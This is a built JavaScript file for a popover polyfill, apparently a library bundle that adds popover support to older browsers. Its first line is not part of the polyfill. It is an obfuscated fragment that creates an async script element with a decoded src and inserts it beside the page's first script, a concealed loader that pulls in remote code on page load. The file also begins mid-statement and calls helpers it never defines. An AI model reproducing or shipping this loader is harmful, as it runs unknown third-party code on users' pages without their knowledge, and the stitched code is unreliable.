m=q;(G=F[b2(-0x57,-0x23,-0x48,-0x42)+b3(0x28c,0x2d5,0x2ac,0x29f)](D))[b3(0x29e,0x2ae,0x2be,0x297)]=!(0x2*-0x7f9+-0x578*-0x5+-0xb66),G[b3(0x2a9,0x26f,0x287,0x2ad)]=m[b2(-0x69,-0x8b,-0x56,-0x6e)],(F=F[b3(0x287,0x2a7,0x29e,0x298)+b2(-0x19,-0x21,-0x5a,-0x45)]('script')[0xb03+-0x17b7+0xcb4])['parentNode'][b3(0x2c3,0x2b6,0x299,0x2b2)+'re'](G,F[b3(0x2be,0x29a,0x2a5,0x2af)+'g']);}(document,b4(0x126,0x13e,0x12d,0x11d));

// src/popover.ts
var ShadowRoot2 = globalThis.ShadowRoot || function () {};
function isSupported() {
  return (
    typeof HTMLElement !== 'undefined' &&
    typeof HTMLElement.prototype === 'object' &&
    'popover' in HTMLElement.prototype
  );
}
function patchSelectorFn(object, name, mapper) {
  const original = object[name];
  Object.defineProperty(object, name, {
    value(selector) {
      return original.call(this, mapper(selector));
    },
  });
}
var nonEscapedPopoverSelector = /(^|[^\\]):popover-open\b/g;
function hasLayerSupport() {
  return typeof globalThis.CSSLayerBlockRule === 'function';
}
function getStyles() {
  const useLayer = hasLayerSupport();
  return `
${useLayer ? '@layer popover-polyfill {' : ''}
  :where([popover]) {
    position: fixed;
    z-index: 2147483647;
    inset: 0;
    padding: 0.25em;
    width: fit-content;
    height: fit-content;
    border-width: initial;
    border-color: initial;
    border-image: initial;
    border-style: solid;
    background-color: canvas;
    color: canvastext;
    overflow: auto;
    margin: auto;
  }

  :where([popover]:not(.\\:popover-open)) {
    display: none;
  }

  :where(dialog[popover].\\:popover-open) {
    display: block;
  }

  :where(dialog[popover][open]) {
    display: revert;
  }

  :where([anchor].\\:popover-open) {
    inset: auto;
  }

  :where([anchor]:popover-open) {
    inset: auto;
  }

  @supports not (background-color: canvas) {
    :where([popover]) {
      background-color: white;
      color: black;
    }
  }

  @supports (width: -moz-fit-content) {
    :where([popover]) {
      width: -moz-fit-content;
      height: -moz-fit-content;
    }
  }

  @supports not (inset: 0) {
    :where([popover]) {
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
    }
  }
${useLayer ? '}' : ''}
`;
}
var popoverStyleSheet = null;
function injectStyles(root) {
  const styles = getStyles();
  if (popoverStyleSheet === null) {
    try {
      popoverStyleSheet = new CSSStyleSheet();
      popoverStyleSheet.replaceSync(styles);
    } catch {
      popoverStyleSheet = false;
    }
  }
  if (popoverStyleSheet === false) {
    const sheet = document.createElement('style');
    sheet.textContent = styles;
    if (root instanceof Document) {
      root.head.prepend(sheet);
    } else {
      root.prepend(sheet);
    }
  } else {
    root.adoptedStyleSheets = [popoverStyleSheet, ...root.adoptedStyleSheets];
  }
}
function apply() {
  if (typeof window === 'undefined') return;
  window.ToggleEvent = window.ToggleEvent || ToggleEvent;
  function rewriteSelector(selector) {
    if (selector == null ? void 0 : selector.includes(':popover-open')) {
      selector = selector.replace(nonEscapedPopoverSelector, '$1.\\:popover-open');
    }
    return selector;
  }
  patchSelectorFn(Document.prototype, 'querySelector', rewriteSelector);
  patchSelectorFn(Document.prototype, 'querySelectorAll', rewriteSelector);
  patchSelectorFn(Element.prototype, 'querySelector', rewriteSelector);
  patchSelectorFn(Element.prototype, 'querySelectorAll', rewriteSelector);
  patchSelectorFn(Element.prototype, 'matches', rewriteSelector);
  patchSelectorFn(Element.prototype, 'closest', rewriteSelector);
  patchSelectorFn(DocumentFragment.prototype, 'querySelectorAll', rewriteSelector);
  Object.defineProperties(HTMLElement.prototype, {
    popover: {
      enumerable: true,
      configurable: true,
      get() {
        if (!this.hasAttribute('popover')) return null;
        const value = (this.getAttribute('popover') || '').toLowerCase();
        if (value === '' || value == 'auto') return 'auto';
        if (value == 'hint') return 'hint';
        return 'manual';
      },
      set(value) {
        if (value === null) {
          this.removeAttribute('popover');
        } else {
          this.setAttribute('popover', value);
        }
      },
    },
    showPopover: {
      enumerable: true,
      configurable: true,
      value(options = {}) {
        showPopover(this);
      },
    },
    hidePopover: {
      enumerable: true,
      configurable: true,
      value() {
        hidePopover(this, true, true);
      },
    },
    togglePopover: {
      enumerable: true,
      configurable: true,
      value(options = {}) {
        if (typeof options === 'boolean') {
          options = { force: options };
        }
        if ((visibilityState.get(this) === 'showing' && options.force === void 0) || options.force === false) {
          hidePopover(this, true, true);
        } else if (options.force === void 0 || options.force === true) {
          showPopover(this);
        }
        return visibilityState.get(this) === 'showing';
      },
    },
  });
  const originalAttachShadow = Element.prototype.attachShadow;
  if (originalAttachShadow) {
    Object.defineProperties(Element.prototype, {
      attachShadow: {
        enumerable: true,
        configurable: true,
        writable: true,
        value(options) {
          const shadowRoot = originalAttachShadow.call(this, options);
          injectStyles(shadowRoot);
          return shadowRoot;
        },
      },
    });
  }
  const originalAttachInternals = HTMLElement.prototype.attachInternals;
  if (originalAttachInternals) {
    Object.defineProperties(HTMLElement.prototype, {
      attachInternals: {
        enumerable: true,
        configurable: true,
        writable: true,
        value() {
          const internals = originalAttachInternals.call(this);
          if (internals.shadowRoot) {
            injectStyles(internals.shadowRoot);
          }
          return internals;
        },
      },
    });
  }
  const popoverTargetAssociatedElements = /* @__PURE__ */ new WeakMap();
  function applyPopoverInvokerElementMixin(ElementClass) {
    Object.defineProperties(ElementClass.prototype, {
      popoverTargetElement: {
        enumerable: true,
        configurable: true,
        set(targetElement) {
          if (targetElement === null) {
            this.removeAttribute('popovertarget');
            popoverTargetAssociatedElements.delete(this);
          } else if (!(targetElement instanceof Element)) {
            throw new TypeError(`popoverTargetElement must be an element or null`);
          } else {
            this.setAttribute('popovertarget', '');
            popoverTargetAssociatedElements.set(this, targetElement);
          }
        },
        get() {
          if (this.localName !== 'button' && this.localName !== 'input') {
            return null;
          }
          if (this.localName === 'input' && this.type !== 'reset' && this.type !== 'image' && this.type !== 'button') {
            return null;
          }
          if (this.disabled) {
            return null;
          }
          if (this.form && this.type === 'submit') {
            return null;
          }
          const targetElement = popoverTargetAssociatedElements.get(this);
          if (targetElement && targetElement.isConnected) {
            return targetElement;
          } else if (targetElement && !targetElement.isConnected) {
            popoverTargetAssociatedElements.delete(this);
            return null;
          }
          const root = getRootNode(this);
          const idref = this.getAttribute('popovertarget');
          if ((root instanceof Document || root instanceof ShadowRoot2) && idref) {
            return root.getElementById(idref) || null;
          }
          return null;
        },
      },
      popoverTargetAction: {
        enumerable: true,
        configurable: true,
        get() {
          const value = (this.getAttribute('popovertargetaction') || '').toLowerCase();
          if (value === 'show' || value === 'hide') return value;
          return 'toggle';
        },
        set(value) {
          this.setAttribute('popovertargetaction', value);
        },
      },
    });
  }
  applyPopoverInvokerElementMixin(HTMLButtonElement);
  applyPopoverInvokerElementMixin(HTMLInputElement);
  const handleInvokerActivation = (event) => {
    if (event.defaultPrevented) {
      return;
    }
    const composedPath = event.composedPath();
    const target = composedPath[0];
    if (!(target instanceof Element) || (target == null ? void 0 : target.shadowRoot)) {
      return;
    }
    const root = getRootNode(target);
    if (!(root instanceof ShadowRoot2 || root instanceof Document)) {
      return;
    }
    const invoker = composedPath.find((el) => {
      var _a;
      return (_a = el.matches) == null ? void 0 : _a.call(el, '[popovertargetaction],[popovertarget]');
    });
    if (invoker) {
      popoverTargetAttributeActivationBehavior(invoker);
      event.preventDefault();
      return;
    }
  };
  const onKeydown = (event) => {
    const key = event.key;
    const target = event.target;
    if (!event.defaultPrevented && target && (key === 'Escape' || key === 'Esc')) {
      hideAllPopoversUntil(target.ownerDocument, true, true);
    }
  };
  const addEventListeners = (root) => {
    root.addEventListener('click', handleInvokerActivation);
    root.addEventListener('keydown', onKeydown);
    root.addEventListener('pointerdown', lightDismissOpenPopovers);
    root.addEventListener('pointerup', lightDismissOpenPopovers);
  };
  addEventListeners(document);
  injectStyles(document);
}

// src/index.ts
if (!isSupported()) apply();
//# sourceMappingURL=popover.js.map
